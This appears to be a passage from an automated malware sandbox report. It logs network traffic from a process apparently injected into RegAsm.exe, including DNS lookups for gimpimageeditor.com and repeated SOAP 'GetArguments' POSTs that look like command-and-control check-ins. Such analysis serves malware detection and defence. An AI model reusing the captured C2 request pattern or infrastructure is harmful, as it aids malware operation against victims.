                                                                                                                        Jan 17, 2025 06:53:54.828807116 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:54.935894966 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:54.942025900 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:55.041356087 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:55.041785002 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:55.048243046 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:55.154629946 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:55.160001040 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:55.260564089 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:55.261276960 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:55.266128063 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:55.373311043 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:55.378209114 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:55.478616953 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:55.478933096 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:55.483830929 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:55.576464891 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:55.581537962 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:55.681890011 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:55.682291031 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:55.687455893 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:55.779604912 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:55.784856081 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:55.890722990 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:55.890997887 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:55.896106005 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:55.982745886 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:55.988147020 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:56.088217974 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:56.088989973 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:56.093897104 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:56.185915947 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:56.190876961 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:56.291475058 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:56.291785002 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:56.296885014 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:56.388959885 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:56.393944979 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:56.495758057 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:56.496191025 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:56.501118898 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:56.592538118 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:56.598315954 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:56.697911978 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:56.698265076 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:56.703130960 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:56.779576063 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:56.785118103 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:56.891376019 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:56.891700029 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:56.897231102 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:56.982624054 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:56.988156080 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:57.089085102 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:57.089426041 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:57.094279051 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:57.170120955 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:57.175163031 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:57.275569916 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:57.275896072 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:57.280770063 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:57.357774019 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:57.362843990 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:57.463545084 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:57.463768005 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:57.468687057 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:57.545304060 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:57.551295996 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:57.652070999 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:57.652381897 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:57.657321930 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:57.732644081 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:57.737677097 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:57.838203907 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:57.838380098 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:57.843265057 CET804985776.223.67.189192.168.2.5
Jan 17, 2025 06:53:57.904496908 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:53:57.909442902 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:53:58.010360003 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:53:58.010626078 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:53:58.015485048 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:53:58.076441050 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:53:58.081451893 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:53:58.186618090 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:53:58.186952114 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:53:58.191812992 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:53:58.248420000 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:53:58.253385067 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:53:58.353944063 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:53:58.354181051 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:53:58.359029055 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:53:58.420393944 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:53:58.425287962 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:53:58.526032925 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:53:58.526278973 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:53:58.531204939 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:53:58.592437983 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:53:58.597529888 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:53:58.698016882 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:53:58.698406935 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:53:58.703329086 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:53:58.764004946 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:53:58.768929005 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:53:58.869761944 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:53:58.870070934 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:53:58.874941111 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:53:58.935750961 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:53:58.940778017 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:53:59.043087959 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:53:59.043437004 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:53:59.048297882 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:53:59.107963085 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:53:59.113851070 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:53:59.214375019 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:53:59.214732885 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:53:59.219662905 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:53:59.279678106 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:53:59.284851074 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:53:59.386310101 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:53:59.386833906 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:53:59.391659975 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:53:59.435997963 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:53:59.440977097 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:53:59.541879892 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:53:59.542294979 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:53:59.547164917 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:53:59.592120886 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:53:59.597441912 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:53:59.698050022 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:53:59.698374987 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:53:59.703629971 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:53:59.748395920 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:53:59.753601074 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:53:59.853921890 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:53:59.854224920 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:53:59.859457016 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:53:59.904511929 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:53:59.909455061 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:00.009922981 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:00.010211945 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:00.015134096 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:00.060822964 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:00.065692902 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:00.175395966 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:00.175729036 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:00.180849075 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:00.217168093 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:00.222282887 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:00.329998970 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:00.330281019 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:00.335201025 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:00.373373032 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:00.378340006 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:00.485892057 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:00.486196995 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:00.491127968 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:00.529540062 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:00.534492970 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:00.642875910 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:00.643142939 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:00.648761988 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:00.685894012 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:00.691790104 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:00.797838926 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:00.798136950 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:00.803014040 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:00.841941118 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:00.846890926 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:00.953946114 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:00.954320908 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:00.959378958 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:00.998198986 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:01.003736973 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:01.110124111 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:01.110316992 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:01.115154982 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:01.154623985 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:01.159703016 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:01.266222954 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:01.266383886 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:01.271229029 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:01.310823917 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:01.316015959 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:01.422068119 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:01.424346924 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:01.429187059 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:01.467139006 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:01.472153902 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:01.583077908 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:01.591609001 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:01.596502066 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:01.640422106 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:01.645512104 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:01.745847940 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:01.747329950 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:01.752177954 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:01.799237967 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:01.804178953 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:01.905710936 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:01.910543919 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:01.915601015 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:01.951348066 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:01.956175089 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:02.078547001 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:02.078737974 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:02.083620071 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:02.107538939 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:02.112499952 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:02.233943939 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:02.234111071 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:02.238996983 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:02.263837099 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:02.268767118 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:02.389806986 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:02.390059948 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:02.395024061 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:02.420466900 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:02.425487995 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:02.545931101 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:02.546134949 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:02.551105022 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:02.576296091 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:02.581278086 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:02.702394009 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:02.702721119 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:02.707629919 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:02.732749939 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:02.737920046 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:02.857983112 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:02.880525112 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:02.891866922 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:02.904568911 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:02.909498930 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:03.042483091 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:03.042668104 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:03.047574997 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:03.076227903 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:03.081187010 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:03.198723078 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:03.198887110 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:03.203782082 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:03.245291948 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:03.250274897 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:03.354504108 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:03.354662895 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:03.359549046 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:03.388744116 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:03.393805981 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:03.510231018 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:03.514158010 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:03.519062042 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:03.569631100 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:03.574783087 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:03.675441980 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:03.675570965 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:03.680566072 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:03.701206923 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:03.706104994 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:03.833153009 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:03.833285093 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:03.839291096 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:03.857547998 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:03.863806963 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:03.988148928 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:03.988462925 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:03.993673086 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:04.013950109 CET  49857  80  192.168.2.5  76.223.67.189
Jan 17, 2025 06:54:04.019087076 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:04.142520905 CET  80  49857  76.223.67.189  192.168.2.5
Jan 17, 2025 06:54:04.142730951 CET  49857  80  192.168.2.5  76.223.67.189
                                                                                                                        Jan 17, 2025 06:54:04.147646904 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:04.170206070 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:04.175122976 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:04.298993111 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:04.299139023 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:04.304064989 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:04.326333046 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:04.331207037 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:04.454514980 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:04.454709053 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:04.459660053 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:04.486108065 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:04.491019011 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:04.610255003 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:54:04.654202938 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:04.889226913 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:54:04.894802094 CET804985776.223.67.189192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 17, 2025 06:52:01.755155087 CET | 64853 | 53 | 192.168.2.5 | 1.1.1.1
Jan 17, 2025 06:52:01.763448954 CET | 53 | 64853 | 1.1.1.1 | 192.168.2.5
Jan 17, 2025 06:52:44.856071949 CET | 51204 | 53 | 192.168.2.5 | 1.1.1.1
Jan 17, 2025 06:52:44.868612051 CET | 53 | 51204 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 17, 2025 06:52:01.755155087 CET | 192.168.2.5 | 1.1.1.1 | 0xfbd1 | Standard query (0) | FUaPHLaTpAPGRbsfxOMdnwBFBsmro.FUaPHLaTpAPGRbsfxOMdnwBFBsmro | A (IP address) | IN (0x0001) | false
Jan 17, 2025 06:52:44.856071949 CET | 192.168.2.5 | 1.1.1.1 | 0x5188 | Standard query (0) | gimpimageeditor.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 17, 2025 06:52:01.763448954 CET | 1.1.1.1 | 192.168.2.5 | 0xfbd1 | Name error (3) | FUaPHLaTpAPGRbsfxOMdnwBFBsmro.FUaPHLaTpAPGRbsfxOMdnwBFBsmro | none | none | A (IP address) | IN (0x0001) | false
Jan 17, 2025 06:52:44.868612051 CET | 1.1.1.1 | 192.168.2.5 | 0x5188 | No error (0) | gimpimageeditor.com | | 76.223.67.189 | A (IP address) | IN (0x0001) | false
Jan 17, 2025 06:52:44.868612051 CET | 1.1.1.1 | 192.168.2.5 | 0x5188 | No error (0) | gimpimageeditor.com | | 13.248.213.45 | A (IP address) | IN (0x0001) | false
                                                                                                                        • gimpimageeditor.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49857 | 76.223.67.189 | 80 | 1520 | C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
Jan 17, 2025 06:52:44.892592907 CET | 240 | OUT | POST / HTTP/1.1
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
    Host: gimpimageeditor.com
    Content-Length: 137
    Expect: 100-continue
    Accept-Encoding: gzip, deflate
    Connection: Keep-Alive
Jan 17, 2025 06:52:45.248487949 CET | 137 | OUT | Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65
    Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
Jan 17, 2025 06:52:45.369277000 CET | 54 | IN | HTTP/1.1 405 Method Not Allowed
    content-length: 0
                                                                                                                        Jan 17, 2025 06:52:59.951571941 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:00.077532053 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:01.092266083 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:01.197765112 CET54INHTTP/1.1 405 Method Not Allowed
